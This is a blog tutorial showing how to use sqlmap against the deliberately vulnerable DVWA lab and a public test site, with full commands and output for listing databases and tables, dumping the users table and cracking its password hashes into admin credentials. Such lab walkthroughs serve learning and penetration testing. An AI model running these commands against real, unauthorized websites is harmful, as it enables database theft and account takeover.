How to Scan SQL Injection Vulnerable Sites using Sqlmap

Posted on by Rimsha Ashraf

With the advancement in technology, there is an increasing risk of cyber-attacks. Websites are becoming more vulnerable to these attacks due to a lot of reasons. SQL injection attacks are increasing rapidly, and the security of web applications is at risk. You can prevent significant data loss, cyber-attacks, and business disruption by scanning your web application. In this article, you will learn more about SQL injection attacks and ways to prevent them.

What is SQL Injection

SQL injection is a kind of attack on web applications that generate SQL queries through user-supplied data. Using the SQL injection, hackers can execute malicious SQL statements responsible for controlling database servers behind websites.

Hackers execute SQL injection attacks to retrieve information on web applications. They get the application’s data by introducing a script or piece of code as a query parameter. There are several SQL injection-attacks such as time-based, union-based, Boolean, and error-based SQL injection.

As a web developer, you should always take measures to protect your web application from SQL vulnerabilities that hackers can use to uncover and exploit.

One of the common tools for detecting and exploiting SQL injection attacks is sqlmap tool.

What is Sqlmap

Sqlmap is an open-source tool used to discover SQL vulnerabilities in websites. It is capable of finding injection points in vulnerable sites using different queries. You can scan and track new security flaws before attacks and perform assessments to find vulnerabilities. It is a penetration testing tool that automates the detection and exploitation of SQL injection flaws.

Sqlmap accepts GET and POST methods to analyze security flaws in targeted web applications. Websites are more vulnerable to SQL injection if there is a bold GET parameter in the URL. This way, hackers can gain access to information in the database. You can check the website’s vulnerability by replacing the GET parameter with an asterisk (*). For example: http://testphp.vulnweb.com/artists.php?artist=1*

If this URL throws an error, this means the website is vulnerable. You can scan or exploit the site’s vulnerability by using sqlmap. Here, you will learn how to use sqlmap to test the website’s SQL injection vulnerability.

What is DVWA

There are several vulnerable web applications through which you can learn SQL injection exploitation. Here we will discuss Damn Vulnerable Web Application (DVWA)

It is a PHP/MySQL web application that is intentionally too vulnerable. Security professionals and ethical hackers test their skills through this application and run it in a legal environment. This vulnerable web application aims to practice common web vulnerabilities with various difficulty levels.

In this tutorial, we’ll be using DVWA as a demonstration environment to test our sqlmap commands.

Setting Everything Up

In this tutorial, you need to install the following:

  1. sqlmap
  2. DVWA: The process is straightforward, follow this guide to set up DVWA on your Ubuntu (or similar). Or this guide on Windows.

If you’re on a Kali machine, then sqlmap is already installed, if not, you can easily install it using the following command:

$ sudo apt-get install sqlmap

In order to verify it’s installed and to see the help menu of the command, pass -h to sqlmap:

$ sqlmap -h

If you don’t want to install DVWA, then you can follow using this public vulnerable website: http://testphp.vulnweb.com/artists.php?artist=1

Once everything is setup, let’s get started.

Determine DBMS in the Site

Before doing any sqlmap command, I want you to login to DVWA with admin as username and password as password, and go to DVWA Security in the bottom left, and set Security level to Low, this will allow us to exploit the website in its weakest form.

Going back to the hacking terminal, the following command is responsible for determining the list of databases in this website:

$ sqlmap -u "http://localhost/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "PHPSESSID=u8e7b7vbkkienkafe68a6pabzf; security=low" -dbs

First, we pass -u parameter in order to pass our target URL, in my case it’s localhost/, but you should put where your DVWA is installed, if it’s in another machine in the same network and in the DVWA folder, then you should put something like 192.168.1.3/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit.

We also pass --cookie argument, since DVWA requires login to start performing SQL injection, then simply passing our cookie will automatically login, you can capture your cookie once you logged in the Developer Console > Network, look for any request, scroll down to Request Headers section and find Cookie.

We pass -dbs to get the list of available databases in the website, here is the output:

available databases [2]:
[*] dvwadb
[*] information_schema

Listing Tables in a Database

If you want to access a particular database, we pass -D parameter to specify the database name that you want to access, and then we specify --tables parameter to list all tables in that database:

$ sqlmap -u "http://localhost/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "PHPSESSID=u8e7b7vbkkienkafe68a6pabzf; security=low" -D dvwadb --tables

Output:

Database: dvwadb
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

Great, we have two tables in this database, in the next section, we’ll dump the users table.

Dumping a Table

In order to see the available columns of a specific table, we must specify the database, the table and --columns argument:

$ sqlmap -u "http://localhost/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "PHPSESSID=u8e7b7vbkkienkafe68a6pabzf; security=low" -D dvwadb -T users --columns

In this case, we pass -T parameter to specify the table name, here is the output:

Database: dvwadb
Table: users
[8 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| password     | varchar(32) |
| user         | varchar(15) |
| avatar       | varchar(70) |
| failed_login | int(3)      |
| first_name   | varchar(15) |
| last_login   | timestamp   |
| last_name    | varchar(15) |
| user_id      | int(6)      |
+--------------+-------------+

Awesome, let’s dump this table to see all the rows of it:

$ sqlmap -u "http://localhost/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "PHPSESSID=u8e7b7vbkkienkafe68a6pabzf; security=low" -D dvwadb -T users --dump

We simply passed --dump instead of --columns, this will prompt you for several questions, including whether you want to store the hashes to a temporary file, or you want to crack the passwords via a dictionary-based attack, I passed Y (yes) for both, here is the output:

do you want to use common password suffixes? (slow!) [y/N] n
[12:40:51] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[12:40:51] [INFO] starting 2 processes
[12:40:53] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[12:40:53] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[12:40:56] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[12:40:58] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
Database: dvwadb
Table: users
[5 entries]
+---------+---------+-----------------------------+-----------+---------------------------------------------+------------+---------------------+--------------+
| user_id | user    | avatar                      | last_name | password                                    | first_name | last_login          | failed_login |
+---------+---------+-----------------------------+-----------+---------------------------------------------+------------+---------------------+--------------+
| 1       | admin   | /hackable/users/admin.jpg   | admin     | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin      | 2020-10-13 15:00:19 | 0            |
| 2       | gordonb | /hackable/users/gordonb.jpg | Brown     | e99a18c428cb38d5f260853678922e03 (abc123)   | Gordon     | 2020-10-08 08:20:45 | 0            |
| 3       | 1337    | /hackable/users/1337.jpg    | Me        | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Hack       | 2020-10-08 08:20:45 | 0            |
| 4       | pablo   | /hackable/users/pablo.jpg   | Picasso   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Pablo      | 2020-10-08 08:20:45 | 0            |
| 5       | smithy  | /hackable/users/smithy.jpg  | Smith     | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Bob        | 2020-10-08 08:20:45 | 0            |
+---------+---------+-----------------------------+-----------+---------------------------------------------+------------+---------------------+--------------+

As you can see, we’ve successfully got the credentials of the admin user and now we have admin access to the website.

You can also pass -C argument to determine the column name(s) you want to dump, since we didn’t specify, it’ll query all available columns in that particular table.

During the cracking of the password, sqlmap will prompt you for the wordlist, you can either use their default or you pass your own wordlist for cracking the password, you can use crunch tool to generate custom wordlists based on your desire.

Conclusion

In this tutorial, we’ve saw the basics of how to use sqlmap utility in order to detect and exploit SQL injection vulnerable websites.

And with sqlmap, you can determine whether a website is vulnerable or not, and if it’s vulnerable, then you can basically retrieve information, update or even delete data. SQL injection is a critical vulnerability that you always want your website to be away from.

Learn also: Enabling/Disabling IP Forwarding in Linux.